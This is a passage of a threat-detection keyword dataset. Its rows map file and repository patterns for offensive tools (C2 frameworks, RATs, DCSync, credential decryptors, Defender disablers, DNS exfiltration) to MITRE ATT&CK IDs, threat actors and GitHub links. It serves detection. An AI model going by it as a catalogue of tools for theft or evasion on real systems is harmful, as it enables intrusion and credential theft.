and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","6434" "*/DataBouncing.git*",".{0,1000}\/DataBouncing\.git.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","1","N/A","N/A","9","1","15","0","2025-03-12T07:34:04Z","2025-03-12T06:58:51Z","6435" "*/DavRelayUp.git*",".{0,1000}\/DavRelayUp\.git.{0,1000}","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","N/A","9","6","542","81","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z","6441" "*/DavRelayUp/*",".{0,1000}\/DavRelayUp\/.{0,1000}","offensive_tool_keyword","DavRelayUp","DavRelayUp - a universal no-fix local privilege escalation in domain-joined windows workstations where LDAP signing is not enforced","T1078 - T1078.004 - T1068","TA0004 - TA0003","N/A","N/A","Privilege 
Escalation","https://github.com/ShorSec/DavRelayUp","1","1","N/A","N/A","9","6","542","81","2023-06-05T09:17:06Z","2023-06-05T07:49:39Z","6442" "*/daytime.nse*",".{0,1000}\/daytime\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6443" "*/dazzleUP.git*",".{0,1000}\/dazzleUP\.git.{0,1000}","offensive_tool_keyword","dazzleUP","A tool that detects the privilege escalation vulnerabilities caused by misconfigurations and missing updates in the Windows operating systems.","T1068 - T1088 - T1210 - T1210.002","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/hlldz/dazzleUP","1","1","N/A","N/A","9","5","490","69","2020-07-23T08:48:43Z","2020-07-21T21:06:46Z","6444" "*/dazzleUP_Reflective_DLL.x64.dll*",".{0,1000}\/dazzleUP_Reflective_DLL\.x64\.dll.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","6445" 
"*/db/dnskire.db*",".{0,1000}\/db\/dnskire\.db.{0,1000}","offensive_tool_keyword","dnskire","A tool for file infiltration over DNS","T1071.004 - T1071.001 - T1048","TA0010 - TA0005 - TA0011","N/A","N/A","Data Exfiltration","https://github.com/0xtosh/dnskire","1","0","#linux","N/A","7","1","17","0","2023-12-07T21:42:34Z","2022-09-10T17:56:30Z","6446" "*/db2_default_userpass.txt*",".{0,1000}\/db2_default_userpass\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","6447" "*/db2-das-info.nse*",".{0,1000}\/db2\-das\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6448" "*/dbc2Loader*",".{0,1000}\/dbc2Loader.{0,1000}","offensive_tool_keyword","DBC2","DBC2 (DropboxC2) is a modular post-exploitation tool composed of an agent running on the victim's machine - a controler running on any machine - powershell modules and Dropbox servers as a means of communication.","T1105 - T1071.004 - T1102","TA0003 - TA0002 - TA0008","N/A","BlackCat - Scattered Spider*","C2","https://github.com/Arno0x/DBC2","1","1","N/A","N/A","10","10","295","86","2017-10-27T07:39:02Z","2016-12-14T10:35:56Z","6449" "*/DBC-Server.py*",".{0,1000}\/DBC\-Server\.py.{0,1000}","offensive_tool_keyword","dns-black-cat","Multi platform toolkit for an interactive DNS shell commands exfiltration - by using DNS-Cat you will be able to execute system commands in shell mode over DNS protocol","T1140 - T1048.003 - T1071.004","TA0011 - TA0040 - TA0001","N/A","N/A","C2","https://github.com/lawrenceamer/dns-black-cat","1","1","N/A","N/A","10","10","114","20","2022-09-15T18:07:05Z","2021-02-13T11:31:22Z","6450" "*/dbms/fingerprint.py*",".{0,1000}\/dbms\/fingerprint\.py.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Vulnerability Scanner","https://github.com/r0oth3x49/ghauri","1","0","#linux","N/A","8","10","3483","361","2025-02-25T19:09:50Z","2022-10-01T11:21:50Z","6451" "*/dbsclrxcvg/b.js*",".{0,1000}\/dbsclrxcvg\/b\.js.{0,1000}","offensive_tool_keyword","badrats","control tool (C2) using Python server - 
Jscript - Powershell and C# implants and communicates via HTTP(S) and SMB","T1059 - T1027 - T1573 - T1071 - T1105","TA0005 - TA0002 - TA0011","N/A","N/A","C2","https://gitlab.com/KevinJClark/badrats","1","0","N/A","N/A","10","1","N/A","N/A","N/A","N/A","6452" "*/DCOM Lateral Movement/*",".{0,1000}\/DCOM\sLateral\sMovement\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","N/A","10","10","347","57","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z","6453" 
"*/dcomexec.exe*",".{0,1000}\/dcomexec\.exe.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","6454" "*/dcomexec.py*",".{0,1000}\/dcomexec\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","6455" "*/dcomhijack.cna*",".{0,1000}\/dcomhijack\.cna.{0,1000}","offensive_tool_keyword","dcomhijack","Lateral Movement Using DCOM with impacket and DLL Hijacking","T1570 - T1021.003 - T1574.001 - T1574.002","TA0008 - TA0003 - TA0005","N/A","N/A","Lateral Movement","https://github.com/WKL-Sec/dcomhijack","1","1","N/A","N/A","7","3","290","24","2023-06-18T20:34:03Z","2023-06-17T20:23:24Z","6456" "*/dcomhijack.git*",".{0,1000}\/dcomhijack\.git.{0,1000}","offensive_tool_keyword","dcomhijack","Lateral Movement Using DCOM and DLL Hijacking","T1021 - T1021.003 - T1574 - T1574.007 - T1574.002","TA0008 - TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/WKL-Sec/dcomhijack","1","1","N/A","N/A","10","3","290","24","2023-06-18T20:34:03Z","2023-06-17T20:23:24Z","6457" "*/dcomhijack.git*",".{0,1000}\/dcomhijack\.git.{0,1000}","offensive_tool_keyword","dcomhijack","Lateral Movement Using DCOM with impacket and DLL Hijacking","T1570 - T1021.003 - T1574.001 - T1574.002","TA0008 - TA0003 - TA0005","N/A","N/A","Lateral Movement","https://github.com/WKL-Sec/dcomhijack","1","1","N/A","N/A","7","3","290","24","2023-06-18T20:34:03Z","2023-06-17T20:23:24Z","6458" 
"*/dcomhijack.py*",".{0,1000}\/dcomhijack\.py.{0,1000}","offensive_tool_keyword","dcomhijack","Lateral Movement Using DCOM with impacket and DLL Hijacking","T1570 - T1021.003 - T1574.001 - T1574.002","TA0008 - TA0003 - TA0005","N/A","N/A","Lateral Movement","https://github.com/WKL-Sec/dcomhijack","1","1","N/A","N/A","7","3","290","24","2023-06-18T20:34:03Z","2023-06-17T20:23:24Z","6459" "*/DCOMPotato.git*",".{0,1000}\/DCOMPotato\.git.{0,1000}","offensive_tool_keyword","DCOMPotato","Service DCOM Object and SeImpersonatePrivilege abuse.","T1548.002 - T1134.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/zcgonvh/DCOMPotato","1","1","N/A","N/A","10","4","356","48","2022-12-09T01:57:53Z","2022-12-08T14:56:13Z","6460" "*/DCOMUploadExec.exe*",".{0,1000}\/DCOMUploadExec\.exe.{0,1000}","offensive_tool_keyword","DCOMUploadExec","DCOM Lateral movement POC abusing the IMsiServer interface - uploads and executes a payload remotely","T1021.003 - T1570 - T1105 - T1569.002","TA0008 - TA0011 - TA0002","N/A","N/A","Lateral Movement","https://github.com/deepinstinct/DCOMUploadExec","1","1","N/A","N/A","9","4","357","52","2024-12-13T14:03:12Z","2024-11-13T16:05:29Z","6461" "*/DCOMUploadExec.git*",".{0,1000}\/DCOMUploadExec\.git.{0,1000}","offensive_tool_keyword","DCOMUploadExec","DCOM Lateral movement POC abusing the IMsiServer interface - uploads and executes a payload remotely","T1021.003 - T1570 - T1105 - T1569.002","TA0008 - TA0011 - TA0002","N/A","N/A","Lateral Movement","https://github.com/deepinstinct/DCOMUploadExec","1","1","N/A","N/A","9","4","357","52","2024-12-13T14:03:12Z","2024-11-13T16:05:29Z","6462" "*/dControl.exe*",".{0,1000}\/dControl\.exe.{0,1000}","offensive_tool_keyword","defender-control","disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://www.sordum.org/9480/defender-control-v2-1/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","6463" 
"*/dControl.rar*",".{0,1000}\/dControl\.rar.{0,1000}","offensive_tool_keyword","defender-control","disable windows defender permanently","T1562.001 - T1562.004 - T1089","TA0005 - TA0002","N/A","LockBit","Defense Evasion","https://www.sordum.org/9480/defender-control-v2-1/","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","6464" "*/DcRat.git*",".{0,1000}\/DcRat\.git.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","1","N/A","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","6465" "*/DcRat.sln*",".{0,1000}\/DcRat\.sln.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","1","N/A","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","6466" "*/DcRat/releases/download/*",".{0,1000}\/DcRat\/releases\/download\/.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","1","N/A","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","6467" "*/dcrypt.exe*",".{0,1000}\/dcrypt\.exe.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 ","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","1","N/A","N/A","10","5","499","108","2024-07-03T10:05:01Z","2019-04-20T14:51:18Z","6468" "*/dcrypt_setup.exe*",".{0,1000}\/dcrypt_setup\.exe.{0,1000}","offensive_tool_keyword","DiskCryptor","DiskCryptor is an open source encryption solution that offers encryption of all disk partitions including system partitions","T1486 
","TA0040","N/A","N/A","Ransomware","https://github.com/DavidXanatos/DiskCryptor","1","1","N/A","N/A","10","5","499","108","2024-07-03T10:05:01Z","2019-04-20T14:51:18Z","6469" "*/dcshadow.html*",".{0,1000}\/dcshadow\.html.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","6470" "*/dcsync_*.txt",".{0,1000}\/dcsync_.{0,1000}\.txt","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","6471" "*/DCSyncer.git*",".{0,1000}\/DCSyncer\.git.{0,1000}","offensive_tool_keyword","DCSyncer","Perform DCSync operation","T1003.006","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/notsoshant/DCSyncer","1","1","N/A","N/A","10","2","143","22","2024-11-05T20:03:27Z","2020-06-06T17:20:22Z","6472" "*/DCSyncer/releases/download/*",".{0,1000}\/DCSyncer\/releases\/download\/.{0,1000}","offensive_tool_keyword","DCSyncer","Perform DCSync operation","T1003.006","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/notsoshant/DCSyncer","1","1","N/A","N/A","10","2","143","22","2024-11-05T20:03:27Z","2020-06-06T17:20:22Z","6473" "*/DCSyncer/tarball/*",".{0,1000}\/DCSyncer\/tarball\/.{0,1000}","offensive_tool_keyword","DCSyncer","Perform DCSync 
operation","T1003.006","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/notsoshant/DCSyncer","1","1","N/A","N/A","10","2","143","22","2024-11-05T20:03:27Z","2020-06-06T17:20:22Z","6474" "*/DCSyncer/zipball/*",".{0,1000}\/DCSyncer\/zipball\/.{0,1000}","offensive_tool_keyword","DCSyncer","Perform DCSync operation","T1003.006","TA0006 - TA0004","N/A","N/A","Credential Access","https://github.com/notsoshant/DCSyncer","1","1","N/A","N/A","10","2","143","22","2024-11-05T20:03:27Z","2020-06-06T17:20:22Z","6475" "*/DDexec.git*",".{0,1000}\/DDexec\.git.{0,1000}","offensive_tool_keyword","Ddexec","A technique to run binaries filelessly and stealthily on Linux by ""overwriting"" the shell's process with another.","T1055.008 - T1106 - T1059.004","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/arget13/DDexec","1","1","#linux","N/A","9","9","830","88","2025-03-21T17:51:04Z","2022-01-27T12:52:10Z","6476" "*/ddexec.sh*",".{0,1000}\/ddexec\.sh.{0,1000}","offensive_tool_keyword","Ddexec","A technique to run binaries filelessly and stealthily on Linux by ""overwriting"" the shell's process with another.","T1055.008 - T1106 - T1059.004","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/arget13/DDexec","1","0","#linux","N/A","9","9","830","88","2025-03-21T17:51:04Z","2022-01-27T12:52:10Z","6477" "*/ddsc.sh *",".{0,1000}\/ddsc\.sh\s.{0,1000}","offensive_tool_keyword","Ddexec","A technique to run binaries filelessly and stealthily on Linux by ""overwriting"" the shell's process with another.","T1055.008 - T1106 - T1059.004","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/arget13/DDexec","1","0","#linux","N/A","9","9","830","88","2025-03-21T17:51:04Z","2022-01-27T12:52:10Z","6478" "*/DDSpoof.git*",".{0,1000}\/DDSpoof\.git.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD 
environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","1","N/A","N/A","9","2","122","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z","6479" "*/ddspoof.py*",".{0,1000}\/ddspoof\.py.{0,1000}","offensive_tool_keyword","DDSpoof","DDSpoof is a tool that enables DHCP DNS Dynamic Update attacks against Microsoft DHCP servers in AD environments.","T1557 - T1584 - T1203","TA0005 - TA0003 TA0011","N/A","N/A","Sniffing & Spoofing","https://github.com/akamai/DDSpoof","1","1","N/A","N/A","9","2","122","13","2024-04-12T22:06:02Z","2023-12-14T06:47:45Z","6480" "*/deadPool.ps1*",".{0,1000}\/deadPool\.ps1.{0,1000}","offensive_tool_keyword","DataBouncing","Data Bouncing is a technique for transmitting data between two endpoints using DNS lookups and HTTP header manipulation","T1048 - T1041","TA0010","N/A","N/A","Data Exfiltration","https://github.com/Unit-259/DataBouncing","1","1","N/A","N/A","9","1","15","0","2025-03-12T07:34:04Z","2025-03-12T06:58:51Z","6481" "*/DeadPotato.git*",".{0,1000}\/DeadPotato\.git.{0,1000}","offensive_tool_keyword","DeadPotato","DeadPotato is a windows privilege escalation utility from the Potato family of exploits leveraging the SeImpersonate right to obtain SYSTEM privileges","T1134.001 - T1068 - T1055 - T1546.015","TA0004 - TA0006 - TA0011","N/A","N/A","Privilege Escalation","https://github.com/lypd0/DeadPotato","1","1","N/A","N/A","10","4","382","45","2024-08-17T06:08:29Z","2024-07-31T01:08:30Z","6482" "*/Deamond RAT 1.2/*",".{0,1000}\/Deamond\sRAT\s1\.2\/.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - 
TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","6483" "*/DeathStar/DeathStar.py*",".{0,1000}\/DeathStar\/DeathStar\.py.{0,1000}","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","#linux","N/A","10","10","1190","163","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z","6484" "*/deb.parrot.sh/*",".{0,1000}\/deb\.parrot\.sh\/.{0,1000}","offensive_tool_keyword","parrot os","Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.","T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105","TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation OS","https://www.parrotsec.org/download/","1","1","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6485" "*/debian/dns2tcp*",".{0,1000}\/debian\/dns2tcp.{0,1000}","offensive_tool_keyword","dns2tcp","Dns2tcp is a tool for relaying TCP connections over DNS","T1071.004 - T1048.003","TA0011 - TA0001","N/A","N/A","C2","https://github.com/alex-sector/dns2tcp","1","0","#linux","N/A","10","10","191","60","2024-06-08T09:40:52Z","2017-11-23T11:19:53Z","6486" "*/DebugAmsi.git*",".{0,1000}\/DebugAmsi\.git.{0,1000}","offensive_tool_keyword","DebugAmsi","DebugAmsi is another way to bypass AMSI through the Windows process debugger mechanism.","T1562.001 - T1050.005","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/MzHmO/DebugAmsi","1","1","N/A","N/A","10","1","97","22","2023-09-18T17:17:26Z","2023-08-28T07:32:54Z","6487" 
"*/decipher_mremoteng.iml*",".{0,1000}\/decipher_mremoteng\.iml.{0,1000}","offensive_tool_keyword","mRemoteNG-Decrypt","Python script to decrypt passwords stored by mRemoteNG","T1555.003 - T1110.003 - T1003 - T1081","TA0006 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/kmahyyg/mremoteng-decrypt","1","1","N/A","N/A","8","1","83","21","2022-10-29T16:02:26Z","2019-05-11T09:09:49Z","6488" "*/DecryptAutoLogon.exe*",".{0,1000}\/DecryptAutoLogon\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","6489" "*/DecryptAutoLogon.exe*",".{0,1000}\/DecryptAutoLogon\.exe.{0,1000}","offensive_tool_keyword","DecryptAutoLogon","Command line tool to extract/decrypt the password that was stored in the LSA by SysInternals AutoLogon","T1003.001 - T1555.003 - T1003.006","TA0006","N/A","N/A","Credential Access","https://github.com/securesean/DecryptAutoLogon","1","1","N/A","N/A","10","3","218","32","2020-12-05T16:14:28Z","2020-12-03T20:38:59Z","6490" "*/DecryptAutoLogon.git*",".{0,1000}\/DecryptAutoLogon\.git.{0,1000}","offensive_tool_keyword","DecryptAutoLogon","Command line tool to extract/decrypt the password that was stored in the LSA by SysInternals AutoLogon","T1003.001 - T1555.003 - T1003.006","TA0006","N/A","N/A","Credential 
Access","https://github.com/securesean/DecryptAutoLogon","1","1","N/A","N/A","10","3","218","32","2020-12-05T16:14:28Z","2020-12-03T20:38:59Z","6491" "*/decrypt-chrome-passwords*",".{0,1000}\/decrypt\-chrome\-passwords.{0,1000}","offensive_tool_keyword","decrypt-chrome-passwords","A simple program to decrypt chrome password saved on your machine.","T1555.003 - T1112 - T1056.001","TA0006 - TA0009 - TA0040","N/A","N/A","Credential Access","https://github.com/ohyicong/decrypt-chrome-passwords","1","1","N/A","N/A","10","10","966","211","2024-07-31T14:08:55Z","2020-12-28T15:11:12Z","6492" "*/decrypted.dmp*",".{0,1000}\/decrypted\.dmp.{0,1000}","offensive_tool_keyword","PPLBlade","Protected Process Dumper Tool that support obfuscating memory dump and transferring it on remote workstations without dropping it onto the disk.","T1003.001 - T1027.004 - T1560.001 - T1039 - T1570","TA0006 - TA0005 - TA0010 - TA0003","N/A","N/A","Credential Access","https://github.com/tastypepperoni/PPLBlade","1","0","N/A","N/A","10","6","545","59","2023-08-30T07:59:51Z","2023-08-29T19:36:04Z","6493" "*/decrypting-lsa-secrets.html*",".{0,1000}\/decrypting\-lsa\-secrets\.html.{0,1000}","offensive_tool_keyword","knowsmore","KnowsMore is a swiss army knife tool for pentesting Microsoft Active Directory (NTLM Hashes - BloodHound - NTDS and DCSync).","T1003 - T1098 - T1134 - T1484 - T1178 - T1078","TA0006 - TA0008 - TA0003 - TA0011 - TA0005","N/A","Black Basta","Credential Access","https://github.com/helviojunior/knowsmore","1","1","N/A","N/A","10","3","223","32","2025-04-14T14:52:09Z","2023-01-09T14:02:37Z","6494" "*/decrypting-lsa-secrets.html*",".{0,1000}\/decrypting\-lsa\-secrets\.html.{0,1000}","offensive_tool_keyword","merlin","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - 
